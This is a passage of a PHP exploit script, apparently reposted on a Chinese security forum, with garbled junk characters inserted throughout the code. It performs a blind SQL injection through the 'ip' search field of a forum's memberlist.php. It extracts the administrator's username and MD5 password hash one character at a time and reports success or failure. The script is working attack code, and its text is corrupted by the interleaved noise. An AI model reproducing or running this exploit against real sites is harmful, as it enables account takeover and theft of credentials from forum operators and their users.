    $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; 3 N6 V' U2 h9 a% k  ?
    echo "sql -> ".$sql."$ V) [9 G. k  D5 j
    ";
    3 r, V# E- |8 X/ w7 M: W$sql=urlencode(strtoupper($sql)); : A) A% Y6 z( O  b5 U1 _
    $data="username="; ' D/ o3 a6 m& [; L/ \
    $data.="&amp;icq=";
    : ~5 V; `9 M; i/ F  r3 ^$data.="&amp;email=";
    7 o+ f$ j/ s/ ^, u3 v$data.="&amp;aim=";
    2 J) A. K- S0 O$data.="&amp;joined_select=lt";
    " B# l4 v, v% ]- s) a; W, f$data.="&amp;joined="; ! Z/ H! J! `, b9 B: d0 @5 C
    $data.="&amp;yahoo=";
    6 `" H1 d# ~8 V+ x( W  ~# C- q, \$data.="&amp;active_select=lt";
    # z0 f9 U3 ?3 E+ J  }$ B- y( ?9 m$data.="&amp;active=";
    + |: N$ i$ x2 n7 a  O$data.="&amp;msn=";
    " D  C# x4 X9 H* q% {$data.="&amp;count_select=eq";
    ' E4 V3 Z7 y# p- Q; S* D$data.="&amp;count="; 9 R; T& v5 v% ]- ~- C' W# P! @5 n
    $data.="&amp;jabber="; 1 _% O4 }; b% t
    $data.="&amp;sk=c"; 6 x7 y5 @- c0 i3 g  s2 q1 ?. g
    $data.="&amp;sd=a"; / K+ `% D- I4 V: l; i" G
    $data.="&amp;ip=".$sql;
    0 T' ]: l) i# C' A, q5 U+ \$data.="&amp;search_group_id=0"; ) L  K2 I: A( V4 i6 L; Z+ a
    $data.="&amp;submit=Search";
    ! r5 A' |/ D* i1 P" W3 J: |$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.05 n9 Q) R$ ?. q" Y: ]% q
    "; # l! _4 h2 _+ o" M: Y
    $packet.="Content-Type: application/x-www-form-urlencoded
    1 i0 O2 E  w+ c6 w2 p"; . C# R! ~3 d0 t% q# Y; }. g
    $packet.="Host: ".$host."
    6 L% F- x# X5 r! P5 t4 H9 V"; - c7 A4 C& D5 D5 h; P
    $packet.="Content-Length: ".strlen($data)."
    ! }* R8 ?7 L2 g";
    ) E# U8 B! W# T' X* j4 ?3 B$packet.="Connection: Close- F6 W$ _0 k" c0 e/ B/ F
    "; % l# m. t5 B" S
    $packet.="Cookie: ".$cookie."
    0 R; n1 r' y# u; R7 P" e4 ]  i# ?: E. \+ `3 V
    "; , T: r- R2 j' e( F+ u3 l1 S
    $packet.=$data;
    1 x7 Y' u9 K/ ~: X. m+ Lsendpacketii($packet);
    6 P8 }. R% H& m) ?% r, l) @0 I7 Aif (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]9 |9 q' R/ T+ V2 i1 }
    ";sleep(2);break;} 0 q% s& R8 ?" A2 E
    }
    . x. s7 t* t; u% R  ^; d0 d2 cif ($i==255) {die("Exploit failed...");} # R! V" g) a; O2 V$ W3 E- b  W
    $j++; ! C& Z- c1 \# y. J* Z+ D
    } 3 `6 {# I8 Z, C$ g  w3 X
    echo "--------------------------------------------------------------------6 F+ a6 r2 a; _9 }
    "; ( e( V. Z. E$ p$ }9 U( J' i
    echo "admin -> ".$admin."( C7 P. T/ k1 C& c2 ~* J5 G! K/ L8 q
    ";
    3 K4 m  @" h6 G+ ]; Y5 techo "password (md5) -> ".$password."
    " X& G3 N+ t! M* N4 J";
    , h1 h2 t4 X( Y& S# ^) i0 Decho "--------------------------------------------------------------------) j  K. l- L4 V
    ";
    ; {" ]5 U6 I' R9 v: u, _) h# J( Nfunction is_hash($hash)
    $ L: y# |) P7 {/ n4 n* K0 {9 P{ ' r5 w+ n, Z$ d( K$ b. U! T
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
    # O3 z+ c" [$ }7 {else {return false;}
    ; l! i. f- d! X' F}
    % P" q) D, B; _8 b! t$ V: Z( cif (is_hash($password)) {echo "Exploit succeeded...";} 5 R: O6 W& x, r
    else {echo "Exploit failed...";} ! C+ C% r- m: l( \0 Q' e
    ?>* w: E$ F# V+ d) m7 [! T6 O/ |
    . F, B6 j( i0 d9 D/ Y6 I6 {  |

    . p& j! g6 b3 X# H+ h
    1 M4 V) G5 G6 r% n0 W! E7 \. H, M. r; S: p8 n: N% w

    8 D- d" o( ?1 j* Z1 b: b( c
    * E3 [$ N# Y* J, [8 [. R3 R. E/ }- R8 b
    , d9 P, q, k. d$ t2 T4 G

    4 }, a* `" q, X3 G  z$ v. @; U) u8 r6 ^+ A0 Z% [8 y; C+ y' g7 j  [3 x
    5 n( q6 V# u) R  a; v
    ; V- `& g5 ?$ b9 k4 }
    , W- V6 S. h6 V- z& l- _
    8 O: E0 X$ N* {$ h( p' U

    ! G6 f! O4 ?* `: B! w
    ( q+ ^) y+ d5 Q$ ^+ x7 R) X  q. k, [  _0 a) i, p+ U7 h0 u
    7 M" F! y1 L8 Z  q( h! L8 A  A% T
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表